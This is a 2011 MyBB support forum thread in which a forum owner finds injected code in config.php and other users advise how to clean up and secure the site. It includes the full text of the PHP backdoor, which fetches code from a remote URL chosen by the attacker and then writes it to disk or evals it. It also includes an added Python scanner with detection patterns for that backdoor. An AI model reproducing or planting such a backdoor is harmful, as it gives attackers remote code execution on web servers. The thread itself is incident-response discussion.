2011-10-17, 05:03 AM
2011-10-17, 05:53 AM
Open the config.php file and check for any vulnerability script added inside it...
I believe after a few more blank lines there may be vulnerable code passing you information.
Check out the post:
http://community.mybb.com/thread-105780-...#pid772311
2011-10-17, 08:37 AM
You should also check with your host as some hosts automatically lower the chmods of files that are chmoded to 777.
2011-10-17, 03:42 PM
This was in the config.php file:
if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '5c971edc0b2cc92fc99b5a3609450cb7'){
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}
2011-10-17, 04:06 PM
EDIT: I've just read your last post now... your file was seriously modified http://wiki.mybb.com/index.php/Inc/config.php
---------------------
I think it's a HOST action, too.
I'm hosted at Mediatemple Gridserver and I think that they have enabled a script to CHMOD to 0444 such plain text files with passwords, when uploaded. Default for other files is 0755.
Anyway, if \inc\config.php is not writable it's a good thing for your security. I see that warning in Maintenance under AdminCP and don't give a orange to it.
To increase security you can add in your-forum-url/inc/ this:
File: /inc/.htaccess
<files config.php>
Order allow,deny
Deny from all
</files>
<files .htaccess>
Order allow,deny
Deny from all
</files>
2011-10-17, 04:08 PM
That's injection code. You're compromised.
2011-10-17, 04:18 PM
What shall I do ?
2011-10-17, 04:27 PM
Delete the code, or just download and re-upload the most recent version of MyBB.
2011-10-17, 04:31 PM
(2011-10-17, 04:27 PM) Paul H. Wrote: Delete the code, or just download and re-upload the most recent version of MyBB.
That won't include config.php though, so upload all new MyBB code (download it again from the site today) and then upload it all.
Clean up the existing config.php.
Delete settings.php and let MyBB recreate it.
Secure your site, change passwords, run security checks on templates, browse your site's file system for odd files you don't recognize, etc.
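The following is an added example, not code from any poster or from MyBB: a Python scan of a forum directory for traces of the backdoor posted above. It relies on the posted code naming each dropped file md5(rand(0,100)).'.php', so only 101 names are possible; the marker list and function names are this example's own assumptions, and hits are leads for manual review.

```python
import hashlib
import os
import re
import sys

# The posted backdoor names each dropped file md5(rand(0,100)).'.php',
# so only 101 file names are possible.
DROPPED_NAMES = {hashlib.md5(str(n).encode()).hexdigest() + ".php" for n in range(101)}

# Patterns taken from the code posted in this thread (assumed marker list).
MARKERS = [
    ("pingnow parameter", re.compile(rb"\$_GET\s*\[\s*['\"]pingnow['\"]\s*\]")),
    ("curl_init on request input", re.compile(rb"curl_init\s*\(\s*\$_(GET|POST|REQUEST)")),
    ("eval of a variable", re.compile(rb"\beval\s*\(\s*\$")),
]

def scan(root):
    """Return sorted (relative_path, reason) findings under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            # A file with one of the 101 possible names is suspect in any directory.
            if name.lower() in DROPPED_NAMES:
                findings.append((rel, "file name matches md5(0..100).php"))
            if not name.lower().endswith((".php", ".inc")):
                continue
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                findings.append((rel, "unreadable"))
                continue
            for reason, pattern in MARKERS:
                if pattern.search(data):
                    findings.append((rel, reason))
    return sorted(findings)

if __name__ == "__main__":
    for rel, reason in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{rel}: {reason}")
```

Run it with the forum root as the only argument; it reads files and changes nothing.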
2011-10-17, 04:44 PM
My guess is that you should have an expert fix and secure this for you. It's likely that it's all backdoored and unless you're thorough to remove every trace of the exploit you'll just be compromised again.